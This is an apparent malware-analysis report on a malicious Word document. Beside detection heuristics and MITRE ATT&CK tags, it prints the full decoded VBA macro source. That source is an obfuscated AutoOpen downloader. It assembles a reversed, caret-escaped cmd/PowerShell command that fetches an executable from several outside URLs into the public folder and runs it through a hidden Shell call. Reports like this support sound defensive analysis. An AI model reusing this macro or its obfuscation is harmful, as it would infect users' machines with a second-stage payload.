MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic firing for Shell() indicates that the macro attempts to execute external commands. The reconstructed string from the VBA script, 'd /V/C "^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yr^t^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^'^+^I^F^t^$+^'^\^'^+ci^l^b^u^p^:vn^e^$^=^F^M^K^$ ;^'^2^9^9^'^ =^ I^F^t$^;)^'^@^'(^t^i^l^p^S^.'^9^UR^s^FR^I5^y^S/^moc.^', appears to be constructing a command to download and execute a second-stage payload. This is consistent with a spearphishing attachment attack.
Heuristics 6
-
ClamAV: Doc.Malware.00536d-6703105-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6703105-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3963 bytes |
SHA-256: 284e782ef74c3b3b11d28ce9a9f9b7a9768ae2c6e432cdd6e459a11dad284c1c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HswWLUQCWVZf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If ClRuVP Eqv 6 Then
BmIkY = "mqow"
End If
If wbbjH Xor YZrpk Then
IsADiC = "MXqM"
End If
If azijw And YsiGz Then
MzRzDQ = "H"
End If
If sSLpZl <= MSFwM Then
aKNOX = "anNYOKzBk"
End If
If DHskw Or 5 Then
hiFPH = "hH"
End If
If EYYcIq And 13 Then
bKvIwP = "Y"
End If
JhzvaaqadHXE (KeyString(luuhbhFO + NGljtnZ + 15 + 4 + 48 + hIRww + Jzcmi) + ZwIrj + JLiHvinQ + KeyString(OBFNh + vbWXHmkA + 17 + 5 + 55 + Lkkvq + YzmpDb) + GjznOEH + MNuimBbhiT + iPuBlGJwWX + JJKXiv + RHfSsNV)
If iSIvfB Xor lWfpjF Then
tFsowZ = "h"
End If
If pCZRE <= ccwQjz Then
jOvpoO = "mwl"
End If
If EJnSk <= zbFGdb Then
jtCNi = "RvIJaDjPTGQs"
End If
If EtIKLQ Eqv 13 Then
iuwiZ = "QcdqnDJCbR"
End If
End Sub
Attribute VB_Name = "HATpKNZjVsdl"
Function GjznOEH()
zjKCKiMiU = "d /V/C" + """" + "^s^e^t ^B^J^" + "1=^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^"
czJNL = " ^}^}{^hc^t" + "^ac}^;^k^a^er^b^;^F" + "^M^K^$^ ^m^e^" + "t^I-^e^k^ovn^I^"
sskLwGilf = ";)^F^M^K^$^ ,E^A" + "^H^$(^e^l^i^F^" + "d^a^o^ln^w^o^" + "D^.^qn^K^$^{^yr" + "t^{)h^b^i^$^"
pmfSAziCsrR = " n^i^ ^E^A^H^$(^hc^a" + "^er^of^;^'^e^x^e" + "^.^'^+^I^F^t^$+^'^" + "\^'^+ci^l^b^u^p^" + ":vn^e^$^=^F^M^K^$"
VnFrvQVwm = ";^'^2^9^9^'^ " + "^=^ I^F^t^" + "$^;)^'^@^'(^"
EEzaDnVfPpU = "t^i^l^p^S^.'^" + "9^UR^s^FR^I" + "5^y^S/^moc.^"
GjznOEH = zjKCKiMiU + czJNL + sskLwGilf + pmfSAziCsrR + VnFrvQVwm + EEzaDnVfPpU
If FTsfQl <= 12 Then
mraSw = "f"
End If
If mbvWn Or 16 Then
XXzRj = "fBn"
End If
End Function
Function MNuimBbhiT()
khbqAZTBsd = "w^o^lra^mna^i^t^s" + "^ir^k//:^p^t^t" + "^h^@R^6^d^1^Yc^x^K/" + "cc^.^tn^ec^s^er^" + "o^u^l^f//^:p" + "^t^t^h^@^P^2^uS"
If vhEZzm <> YUSwf Then
wfDwr = "j"
End If
If jptZG Xor oiYklS Then
PRiuo = "tlWq"
End If
If LATFq And 7 Then
PaNwTo = "GjI"
End If
If RuAzTw = qipoio Then
QZWDGr = "VIuEzMUnZ"
End If
djzPjTOihW = "^Bv^Tc^1/r^b" + "^.^m^oc^.v^e^d" + "n^o^i^t^o^m//^"
If CSZVO Eqv UTAQZm Then
JdYlkf = "k"
End If
iRQlUFuQCn = ":^p^t^t^h^@^z^q^F" + "v^s^q^Oc^a^B/" + "^m^oc^.^a^dn^os^" + "i^d^a^m//^:" + "^p^t^t^h^@XR^" + "l^A^f^B^I/^m^oc.^"
If jvBool = zWnOVM Then
CzHDmU = "FhhcJ"
End If
If GsUmRC = WzOmY Then
EHWlXu = "iI"
End If
uXLVQfVNzA = "i^j^ol^o^y" + "i^b^or^k^i^m^a" + "d^ig//^:^p"
If iWBRiO = 5 Then
LfUTq = "iQz"
End If
If pEwWf <> VBUhN Then
nBDpmK = "V"
End If
If hwmWYk And DdsqwN Then
MrabUO = "GhICt"
End If
aRICL = "^t^th^'^=^h^b^i^$" + "^;^tn^ei^lC^b^e^W^" + ".^t^eN^ ^tc^e^j^b^o" + "^-^wen^=^q" + "n^K^$^ ^l^l^e"
MNuimBbhiT = khbqAZTBsd + djzPjTOihW + iRQlUFuQCn + uXLVQfVNzA + aRICL
If iTfUm Xor ITEVpD Then
jSiDj = "VFnWloTfM"
End If
If VYmdY < zLIzRh Then
lbVjHb = "pIoiSF"
End If
If LSMkh > 1 Then
SwurcI = "LR"
End If
End Function
Function iPuBlGJwWX()
rZrTMGHqXh = "^h^sr^e^w^o^p" + "&&^f^or /^L %^F " + "^in (3^8^0" + "^,^-^1^,^0)^" + "d^o ^s^e^t" + " ^L^y^G=!^L^y^G!!^B"
PicHAcPtZ = "^J^1:~%^F,1!&&^i^" + "f %^F ^l^s^" + "s ^1 c^a^l^l %^" + "L^y^G:^~^5%" + """"
iPuBlGJwWX = rZrTMGHqXh + PicHAcPtZ
If qKblG > Jqwtf Then
DvjwJ = "rbzdL"
End If
End Function
Attribute VB_Name = "SHUhZOwXOw"
Function JhzvaaqadHXE(YKIBwVS As String)
Const AqorwRr = 16425839 - 16425839
If qiUMt <= ScuMw Then
ADPZd = "a"
End If
If BbdUo Xor MqPja Then
DUPia = "foiRI"
End If
If Wtjpn And UYjjTf Then
wjrdVd = "kII"
End If
Shell# YKIBwVS, AqorwRr
If mjNkOM <= TEJcU Then
ardwDG = "GJjuf"
End If
If MQOEO Xor EEUkoX Then
XwENc = "aEFjiA"
End If
If UHjjE >= kRUHzZ Then
rDuul = "tz"
End If
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.